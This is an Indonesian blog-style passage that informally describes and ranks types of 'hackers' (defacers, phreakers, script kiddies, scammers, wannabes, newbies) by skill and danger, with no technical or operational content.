Defacer? Pernah ada suatu kasus saya melihat orang dengan bangganya memamerkan nama panggilannya didalam sebuah website milik orang lain. Lalu berkata “Website itu sudah aku hack” HACK? SUMPE LO? defacer kebanyakan umum-nya adalah orang iseng yang sedang ingin mencoba mencari tau baik dari segi ilmu, kemampuan, dan jati diri… kebiasaan yang paling mudah diketahui adalah mereka gemar merubah tampilan website menggunakan/memanfaatkan kelemahan bug/kecacatan dalam sebuah program. Defacer umumnya tidak begitu memahami tentang level pemrograman mereka lebih cenderung memahami tentang kinerja sebuah webserver beserta script yang ada didalamnya.
Phreaker, Mungkin jarang di Indonesia yang pernah mendengar kata ini. Phreaker ini sebenarnya hampir sama sifatnya dengan cracker dimana sama-sama menyukai GRATISAN. Bedanya Phreaker lebih fokus ke dalam bug jaringan/telekomunikasi. Contoh mudahnya orang bisa menelpon gratis  padahal seharusnya berbayar, atau contoh lainnya seseorang menggunakan bug yang ada didalam sebuah perusahaan telekomunikasi (meskipun tidak diketahui bocornya informasi ini hasil sendiri atau diberi tahu orang dalam) itu adalah salah satu kegiatan phreaking dan orang yang melakukannya di sebut phreaker.
Hacker Wannabe, ini yang sangat banyak dan mudah di jumpai di Indonesia :)   banyaaaaaaakkkkkkkkk sekaliiiii… terutama di forum-forum. Saya kurang paham arti harfiah hacker wannabe tapi sebenarnya ini lebih cenderung mengarah ke psikologi dimana umum-nya para hacker wannabe ini ingin melakukan sesuatu yang gila dan di luar kenormalan baik di dalam cakupan kemampuannya atau diluar kemampuannya dengan tujuan mendapatkan pengakuan “hebat” atau “mampu” dari orang di sekitarnya. Contoh paling mudah kalau kalian punya teman yang mengaku bisa/jago hacking facebook/friendster dia termasuk dalam kategori hacker wannabe ini…
Script kiddies, Ini juga sangat mudah dan banyaaaaaaaaaaaaaaaaaaaaaaaaak bisa di temukan di Indonesia. Kebanyakan script kiddies ini kebanyakan berbicara blablabla padahal sebenarnya dasar tentang apa yang dia lakukan dia tidak paham. Script kiddies bisa di masukkan dalam kategori advanced user dimana keahliannya adalah “menggunakan” bukan “menemukan” apalagi sampai tingkat “menciptakan” kebanyakan manusia bergaya script kiddies adalah para defacer yang suka merubah tampilan website dengan menggunakan tools/software/program yang bukan buatannya/hasil pemikirannya sendiri.
Scammer! Kalau ini sih dulu sempat booming di Indonesia sekitar tahun 2000-2005 kalau di Indonesia dulu di beri julukan frauder alias penipu dunia maya yang cenderung menyukai melakukan penipuan/manipulasi/generalisasi kartu kredit untuk mendapatkan beberapa barang kesukaannya. Hampir sama jenisnya dengan cracker/phreaker namun sangat ceroboh dan bodoh. Umumnya scammer/frauder ini memahami tentang seluk beluk jaringan namun sangat buta tentang pemrograman dasar dan keamanan.
Newbie… kalau yang ini sih sudah tidak perlu di letakkan dalam posisi abu-abu. Group newbie ini memang benar-benar pemula alias orang yang mungkin benar-benar baru menggunakan komputer. Kebanyakan newbie bisa berkembang menjadi Hacker, Cracker, Defacer, Phreaker, Hacker Wannabe, Script kiddies, sampai Scammer. Newbie ini seperti sebuah telur yang akan ditentukan oleh tingkat pengetahuannya untuk menangkap sebuah pelajaran atau keadaan lingkungannya. Newbie bisa berubah menjadi apa saja asal ada pendukungnya dan bagaimana cara dia menilai sesuatu berdasarkan pikirannya.
Di urut berdasarkan tingkat kemampuan dan berbahaya-nya reputasi berdasarkan kategori :
  1. Hacker
  2. Phreaker
  3. Cracker
  4. Scammer
  5. Defacer
  6. Script kiddies
  7. Hacker wannabe
  8. Newbie
Sumber:  http://id.istanto.net